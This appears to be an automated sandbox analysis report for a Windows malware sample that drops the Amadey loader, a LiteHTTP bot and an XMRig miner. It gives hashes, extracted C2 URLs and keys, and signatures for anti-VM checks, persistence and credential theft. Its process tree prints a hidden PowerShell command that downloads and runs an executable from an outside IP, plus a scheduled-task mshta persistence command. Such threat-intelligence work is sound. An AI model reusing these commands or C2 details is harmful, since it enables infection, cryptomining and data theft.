Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 17:53
Static task
static1
General
-
Target
74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe
-
Size
938KB
-
MD5
f05c426533feda04db6bff6509118219
-
SHA1
1d14d9f5090f9823f8bcf5f11815ab96fe5ac448
-
SHA256
74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d
-
SHA512
5f3d0c65ae241842ee84bedc24ef29e06961206c1c6757a1a9d7e52a826f350aca04c1e0f91780e5c084cd91a2757f0a80f064c805c152005952619444383139
-
SSDEEP
24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0pu:/TvC/MTQYxsWR7a0p
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Litehttp family
-
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/2340-208-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2340-211-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2340-212-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2340-214-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2340-213-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2340-209-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2340-215-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2340-327-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2340-328-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 15 1080 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 1080 powershell.exe 2664 powershell.exe 1352 powershell.exe 4524 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 4092 bitsadmin.exe -
Downloads MZ/PE file 8 IoCs
flow pid Process 31 4424 rapes.exe 31 4424 rapes.exe 31 4424 rapes.exe 31 4424 rapes.exe 31 4424 rapes.exe 31 4424 rapes.exe 31 4424 rapes.exe 15 1080 powershell.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CDQ_Docker.lnk cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CDQ_Docker.lnk cmd.exe -
Executes dropped EXE 16 IoCs
pid Process 1656 TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE 4424 rapes.exe 4552 ce4pMzk.exe 1840 v6Oqdnc.exe 3492 rapes.exe 2644 OEHBOHk.exe 1108 MCxU5Fj.exe 4124 MCxU5Fj.exe 4084 ckonftponqgz.exe 3684 Y87Oyyz.exe 4816 Y87Oyyz.exe 2976 SplashWin.exe 4736 SplashWin.exe 3240 zY9sqWs.exe 1560 rapes.exe 2580 Ps7WqSx.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe -
Loads dropped DLL 10 IoCs
pid Process 4816 Y87Oyyz.exe 2976 SplashWin.exe 2976 SplashWin.exe 2976 SplashWin.exe 4736 SplashWin.exe 4736 SplashWin.exe 4736 SplashWin.exe 4736 SplashWin.exe 4736 SplashWin.exe 888 Syncsign_v1.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\qynnBWJd\\Anubis.exe\"" ce4pMzk.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4580 powercfg.exe 3812 powercfg.exe 1208 powercfg.exe 464 powercfg.exe 3956 powercfg.exe 1108 powercfg.exe 1980 powercfg.exe 3524 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1656 TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE 4424 rapes.exe 1840 v6Oqdnc.exe 3492 rapes.exe 1560 rapes.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1108 set thread context of 4124 1108 MCxU5Fj.exe 120 PID 4084 set thread context of 1868 4084 ckonftponqgz.exe 154 PID 4084 set thread context of 2340 4084 ckonftponqgz.exe 156 PID 4736 set thread context of 1060 4736 SplashWin.exe 166 -
resource yara_rule behavioral2/memory/2340-203-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-204-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-208-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-207-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-211-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-212-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-214-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-213-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-206-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-209-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-205-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-215-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-327-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2340-328-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1912 sc.exe 4436 sc.exe 2520 sc.exe 2556 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1128 1108 WerFault.exe 119 -
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings rapes.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4500 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1080 powershell.exe 1080 powershell.exe 1656 TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE 1656 TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE 4424 rapes.exe 4424 rapes.exe 4552 ce4pMzk.exe 4552 ce4pMzk.exe 4552 ce4pMzk.exe 4552 ce4pMzk.exe 1840 v6Oqdnc.exe 1840 v6Oqdnc.exe 1840 v6Oqdnc.exe 1840 v6Oqdnc.exe 1840 v6Oqdnc.exe 1840 v6Oqdnc.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 3492 rapes.exe 3492 rapes.exe 4124 MCxU5Fj.exe 4124 MCxU5Fj.exe 4124 MCxU5Fj.exe 4124 MCxU5Fj.exe 2644 OEHBOHk.exe 1352 powershell.exe 1352 powershell.exe 1352 powershell.exe 2644 OEHBOHk.exe 2644 OEHBOHk.exe 2644 OEHBOHk.exe 2644 OEHBOHk.exe 2644 OEHBOHk.exe 2644 OEHBOHk.exe 2644 OEHBOHk.exe 2644 OEHBOHk.exe 2644 OEHBOHk.exe 4084 ckonftponqgz.exe 4524 powershell.exe 4524 powershell.exe 4524 powershell.exe 4084 ckonftponqgz.exe 4084 ckonftponqgz.exe 4084 ckonftponqgz.exe 4084 ckonftponqgz.exe 4084 ckonftponqgz.exe 4084 ckonftponqgz.exe 4084 ckonftponqgz.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe 2340 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4736 SplashWin.exe 1060 cmd.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 4552 ce4pMzk.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeShutdownPrivilege 3812 powercfg.exe Token: SeCreatePagefilePrivilege 3812 powercfg.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeCreatePagefilePrivilege 1208 powercfg.exe Token: SeShutdownPrivilege 4580 powercfg.exe Token: SeCreatePagefilePrivilege 4580 powercfg.exe Token: SeShutdownPrivilege 3524 powercfg.exe Token: SeCreatePagefilePrivilege 3524 powercfg.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeShutdownPrivilege 1108 powercfg.exe Token: SeCreatePagefilePrivilege 1108 powercfg.exe Token: SeShutdownPrivilege 464 powercfg.exe Token: SeCreatePagefilePrivilege 464 powercfg.exe Token: SeShutdownPrivilege 1980 powercfg.exe Token: SeCreatePagefilePrivilege 1980 powercfg.exe Token: SeShutdownPrivilege 3956 powercfg.exe Token: SeCreatePagefilePrivilege 3956 powercfg.exe Token: SeLockMemoryPrivilege 2340 explorer.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 1656 TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1660 wrote to memory of 768 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 85 PID 1660 wrote to memory of 768 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 85 PID 1660 wrote to memory of 768 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 85 PID 1660 wrote to memory of 2148 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 86 PID 1660 wrote to memory of 2148 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 86 PID 1660 wrote to memory of 2148 1660 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 86 PID 768 wrote to memory of 4500 768 cmd.exe 88 PID 768 wrote to memory of 4500 768 cmd.exe 88 PID 768 wrote to memory of 4500 768 cmd.exe 88 PID 2148 wrote to memory of 1080 2148 mshta.exe 90 PID 2148 wrote to memory of 1080 2148 mshta.exe 90 PID 2148 wrote to memory of 1080 2148 mshta.exe 90 PID 1080 wrote to memory of 1656 1080 powershell.exe 99 PID 1080 wrote to memory of 1656 1080 powershell.exe 99 PID 1080 wrote to memory of 1656 1080 powershell.exe 99 PID 1656 wrote to memory of 4424 1656 TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE 100 PID 1656 wrote to memory of 4424 1656 TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE 100 PID 1656 wrote to memory of 4424 1656 TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE 100 PID 4424 wrote to memory of 4552 4424 rapes.exe 103 PID 4424 wrote to memory of 4552 4424 rapes.exe 103 PID 4424 wrote to memory of 1840 4424 rapes.exe 112 PID 4424 wrote to memory of 1840 4424 rapes.exe 112 PID 4424 wrote to memory of 1840 4424 rapes.exe 112 PID 4552 wrote to memory of 2664 4552 ce4pMzk.exe 115 PID 4552 wrote to memory of 2664 4552 ce4pMzk.exe 115 PID 4424 wrote to memory of 2644 4424 rapes.exe 118 PID 4424 wrote to memory of 2644 4424 rapes.exe 118 PID 4424 wrote to memory of 1108 4424 rapes.exe 119 PID 4424 wrote to memory of 1108 4424 rapes.exe 119 PID 4424 wrote to memory of 1108 4424 rapes.exe 119 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 1108 wrote to memory of 4124 1108 MCxU5Fj.exe 120 PID 744 wrote to memory of 768 744 cmd.exe 139 PID 744 wrote to memory of 768 744 cmd.exe 139 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 1868 4084 ckonftponqgz.exe 154 PID 4084 wrote to memory of 2340 4084 ckonftponqgz.exe 156 PID 4084 wrote to memory of 2340 4084 ckonftponqgz.exe 156 PID 4084 wrote to memory of 2340 4084 ckonftponqgz.exe 156 PID 4084 wrote to memory of 2340 4084 ckonftponqgz.exe 156 PID 4084 wrote to memory of 2340 4084 ckonftponqgz.exe 156 PID 2140 wrote to memory of 4028 2140 cmd.exe 161 PID 2140 wrote to memory of 4028 2140 cmd.exe 161 PID 4424 wrote to memory of 3684 4424 rapes.exe 162 PID 4424 wrote to memory of 3684 4424 rapes.exe 162 PID 4424 wrote to memory of 3684 4424 rapes.exe 162 PID 3684 wrote to memory of 4816 3684 Y87Oyyz.exe 163 PID 3684 wrote to memory of 4816 3684 Y87Oyyz.exe 163 PID 3684 wrote to memory of 4816 3684 Y87Oyyz.exe 163 PID 4816 wrote to memory of 2976 4816 Y87Oyyz.exe 164
Processes
-
C:\Users\Admin\AppData\Local\Temp\74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe"C:\Users\Admin\AppData\Local\Temp\74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn iE2timai3HX /tr "mshta C:\Users\Admin\AppData\Local\Temp\sZkO8QsVL.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn iE2timai3HX /tr "mshta C:\Users\Admin\AppData\Local\Temp\sZkO8QsVL.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4500
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\sZkO8QsVL.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE"C:\Users\Admin\AppData\Local\TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1656 -
